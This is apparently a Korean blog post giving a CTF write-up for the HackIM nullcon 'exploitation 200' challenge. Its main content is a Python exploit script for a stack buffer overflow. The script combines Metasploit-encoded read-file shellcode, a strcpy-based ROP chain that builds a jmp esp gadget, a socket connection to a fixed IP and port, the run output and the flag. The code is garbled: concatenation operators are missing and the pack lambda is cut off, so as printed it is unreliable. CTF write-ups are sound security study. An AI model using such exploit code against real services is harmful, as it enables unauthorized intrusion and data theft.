상세 컨텐츠

본문 제목

HackIM nullcon exploiation 200 write-up [exploit]

0x10 정보보안/0x15 System

by sweetchip 2014. 1. 27. 15:23

본문

반응형



주제 : Simple stack based buffer overflow


binary :

srv2



from socket import *

import struct

import time


p = lambda x : struct.pack("


ip = "192.168.0.109"

ip = "23.23.190.205"

port = 6776


"""

/*

* linux/x86/read_file - 97 bytes

* http://www.metasploit.com

* Encoder: x86/shikata_ga_nai

* VERBOSE=false, PrependSetresuid=false,

* PrependSetreuid=false, PrependSetuid=false,

* PrependSetresgid=false, PrependSetregid=false,

* PrependSetgid=false, PrependChrootBreak=false,

* AppendExit=false, PATH=flag.txt, FD=4

*/

"""

shellcode = ("\xb8\xf6\x7e\xa8\x82\xdd\xc6\xd9\x74\x24\xf4\x5b\x2b\xc9\xb1"

"\x12\x31\x43\x14\x03\x43\x14\x83\xeb\xfc\x14\x8b\x43\xb4\x60"

"\x71\x94\xb9\x90\x21\xa5\x70\x5d\x55\x4c\x41\xe5\x55\x4f\x46"

"\x15\xd3\xa8\xcf\xec\x59\x36\xc0\x0e\x9e\xfa\x60\x87\x5c\xbc"

"\x65\x97\x60\xbd\xde\x93\x60\xbd\x20\x56\xe0\x05\x21\x68\xe1"

"\x75\x99\x68\xe1\x75\xdd\xa5\x61\x9d\x18\xca\x9d\xa1\xc5\x58"

"\x03\x39\x24\xd4\xbb\xb1\x38")


shellcode = "\x90"*100 shellcode


s = socket(AF_INET, SOCK_STREAM)

s.connect((ip, port))


recv = 0x08048720

send = 0x08048750

strcpy = 0x08048640

freespace = 0x0804b301

pr = 0x08048b54


nnjesp = 0x9090ffe4


raw_input("go? ")


payload = ":"

payload = "A" * (0xdc - len(payload))

payload = "BBBB"

payload = "\x0a"


payload = p(strcpy)

payload = p(pr-1) # ppr

payload = p(freespace)

payload = p(0x08048640) # 0xff


payload = p(strcpy)

payload = p(pr-1) # ppr

payload = p(freespace 1)

payload = p(0x08048766) # 0xe4


payload = p(strcpy)

payload = p(pr-1) # ppr

payload = p(freespace 2)

payload = p(0x08048e57) # 0x90


payload = p(strcpy)

payload = p(pr-1) # pppr

payload = p(freespace 3)

payload = p(0x08048e57) # 0x90


payload = p(freespace) # jmp esp

payload = shellcode # <-- esp!!


s.recv(1024)


print "[*] Sending Exploit.."

time.sleep(1)

s.send(payload "\n")


print "[*] cat key :D"

time.sleep(1)

print s.recv(1024)


raw_input("> ")


"""

C:\Users\Administrator\Desktop\nullcon>ex2.py

go?

[*] Sending Exploit..

[*] cat key :D

6ffcffda1c58f6dbe4dcd5b715de538c


>


C:\Users\Administrator\Desktop\nullcon>

"""


바이너리에는 간단한 buffer overflow 취약점이 존재한다.


aslr이 걸려있다는 가정하에 exploit 코드를 작성한다



Flag : 6ffcffda1c58f6dbe4dcd5b715de538c

반응형

관련글 더보기